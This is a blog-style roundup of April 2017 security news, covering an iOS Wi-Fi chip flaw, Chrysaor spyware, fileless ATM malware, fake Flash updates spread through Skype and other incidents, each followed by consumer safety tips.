Data Security News Headlines 5th April 2017

  1. Update Your Apple Devices to iOS 10.3.1 to Avoid Being Hacked Over Wi-Fi

The Security researcher found few critical vulnerabilities in iOS 10.3 and one of which could allow hackers to “execute arbitrary code on the Wi-Fi chip. The vulnerability, identified as CVE-2017-6975, was discovered by Google’s Project Zero staffer Gal Beniamini. Apple describes the issue as a stack buffer overflow vulnerability, which the company addressed by improving the input validation. A stack buffer overflow flaw occurs when the execution stack grows beyond the memory that is reserved for it, allowing hackers to execute malicious code remotely. Successful exploitation could allow an attacker, within range, to execute malicious code on the phone’s Wi-Fi chip. The vulnerability appears to affect iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation, and later devices running the iOS 10.3 operating system according to news published by Hacker New.

Cyber Security Tips:  Apple users who are using iOS 3.0 are recommended to update to iOS 10.3.1. The iOS 10.3.1 update can be download via Settings → General → Software Update on your iOS device.

  1. Google just discovered a dangerous Android Spyware that went undetected for 3 Years

Android spyware is not a news for us, the researcher at Lookout and Google, discovered spyware called Chrysaor. This spyware has been discovered that remained undetected for at least three years due to its smart self-destruction capabilities. The Android spyware has been used in targeted attacks against activists and journalists mostly in Israel, but also in Georgia, Turkey, Mexico, the UAE and other countries. Once this spyware successfully installed it is able to do;  Exfiltration data from popular apps including Gmail, WhatsApp, Skype, Facebook, Twitter, It can Control device remotely, Recording live audio and video, Keylogging and Screenshot capture, Disabling of system updates to prevent vulnerability patching, Spying on contacts, text messages, emails and browser history, Self-destruct to evade detection

Researcher said that this malware also distributed via SMS-based phishing messages.

Cyber Security Tips:  Users are recommended that install application from trusted sources only, never click on malicious messages, keep your device password protected, keep your application up-to-date and enable ‘verify apps’ feature from settings.

  1. Hackers stole $800,000 from ATMs using Fileless Malware

Hackers targeted at least 8 ATMs in Russia and stole $800,000 in a single night, with Fileless malware. Fileless malware are types of malicious code used in cyber-attacks that don’t use files to launch the attack and carry on the infection on the affected device or network. The infection is run in the RAM memory of the device. The affected banks could not find any trace of malware on its ATMs or backend network or any sign of an intrusion. The bank found only the hard drive was two files containing malware logs. The log files included the two process strings containing the phrases: “Take the Money Bitch!” and “Dispense Success. According to the researchers, the attacks against banks were carried out using a Fileless malware that resides solely in the memory (RAM) of the infected ATMs, rather than on the hard drive. This ATM theft takes just a few seconds to be completed without the operator physically going near the machine. Once the ATM has been empt ied, the operator ‘signs off,’ leaving a very little trace, if any, of the malware.

Cyber Security Tips:  To protect yourself from Fileless malware, apply security updates for your applications and operating system, blocking the pages hosting the exploit kit, keep using reputed antivirus and keep your device physically secured.

  1. Android is now world’s most popular Operating System

According to a new report from web traffic analytics firm StatCounter, Google’s Android is the most popular operating system worldwide in terms of total internet usage across desktop, laptop, tablet, and mobile combined. Android represented 37.93 percent of the global OS Internet usage market share in March, while Windows accounted for 37.91 percent. The report showed that Windows is still holding a 39.5 percent of the Internet usage market share against Android’s 25.7 percent in North America, and 51.7 percent against 29.2 percent in Europe.

  1. Hackers can take over Smart Dildos and stream videos online

Researchers have discovered a simple way to hack an Internet-connected vibrator that, of course, comes equipped with a camera. After hacking the device, a video can be streamed live, and the user might not even know what happened. Security firm Pen Test Partners’s researchers have discovered that a device called Svakom Siime Eye that costs about $250 is easy to hack and it’s possible because the dildo comes with a video camera with streaming capability. The problem occurs because of the unsecured connection, and if someone is in the range of dildo’s Wi-Fi connection and could guess its password, they can quickly “join in on the fun. The device’s default password is 88888888, and if the user forgets to change the default login credentials. The hacker can remotely take control of the firmware and benefit from the situation by live-streaming it without the victim’s knowledge according to news published by HackRead.

Cyber Security Tips: Hacking IoT devices is not new for us, users are recommended keep their home Wi-Fi secured with strong encryption as well as strong password, keep your smart devices up to date and change default credentials

  1. Skype users hit by ransomware

Skype is an instant messaging app that provides online text message and video chat services. Users may transmit both text and video messages and may exchange digital documents such as images, text, and video. From few days Skype users noticed that the instant messaging service served a malicious malware masquerading as fake Flash player update. The fake Flash player update contains an HTA file (HTML application file) and was designed to execute a PowerShell script to download a payload. The payload could be a JSE (encrypted JavaScript). The file was probably going to install a Trojan or ransomware on victim’s devices. The malicious ransomware called oyomakaomojiya[.]org and cievubeataporn[.]net.

Cyber Security Tips: Skype users are strongly recommended that never click on such notification, avoid to install flash player from such notification and keep using reputed antivirus and ransomware protection.

  1. Android apps can breach and share your personal data

If you are using the smart phone with multiple apps, be aware your personal data can be share with another. A study showed that applications on the android phones are able to talk to one another and trade information. The biggest security risks were some of the least utilitarian apps that pertained to personalisation of ringtones, widgets, and emojis, the researchers said. The team examined a whopping 110,150 apps over three years including 100,206 of Google Play’s most popular apps and 9,994 malware apps from Virus Share a private collection of malware app samples. The Researcher found thousands of pairs of apps that could potentially leak sensitive phone or personal information and allow unauthorized apps to gain access to privileged data.

Cyber Security Tips: Users are recommended that check your app permissions while installing, install apps from trusted sources only, be aware while sharing any personal details over the apps and keep using reputed antivirus to detect malicious applications.

  1. Nia Sharma’s Instagram account gets HACKED!

Instagram is a mobile photo-sharing application and service that allows users to share pictures and videos either publicly or privately. Hacking Instagram account is not new for us, hackers are targeting celebrities, the latest victim is popular TV actress Nia Sharma, Her Instagram account has been hacked and all her posts have also been deleted. Nia has apparently filed a complaint. The Reason of hacking is not cleared yet.

Cyber Security Tips: To protect from such hack keep using a strong password, keep changing your password regularly, turn on two-way authentication, make sure your email account is secure, never click on remember me, think before you authorize any third-party app and logout yourself.

  1. Cyber criminals dupe IAS officer of ₹73 lakh

Hackers are targeting banking users by social engineering. The latest victim is a senior officer of the Indian Administrative Service has lodged a complaint of cyber theft against unknown persons for allegedly duping him of ₹2.73 lakh after getting to know his ATM card details. According to the Ashok Nagar police, the FIR was lodged under relevant sections of the Information Technology Act on the complaint of JC Mohanty. Mohanty lodged the FIR on Monday and has alleged that a fraudster, who introduced himself as an employee of the State Bank of Bikaner and Jaipur (SBBJ), debited ₹2.73 lakh after asking his ATM card details,” said a police official from the Ashok Nagar police station. The accused managed to debit the money after getting ATM details and OTP number from Mohanty as per the news published by Hindustan times.

Cyber Security Tips: To protect yourself from such fraud keep your bank data such as ATM card, pin no, password, one-time password, account numbers secure and never share banking details.

 

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Blog at WordPress.com.

Up ↑

%d bloggers like this: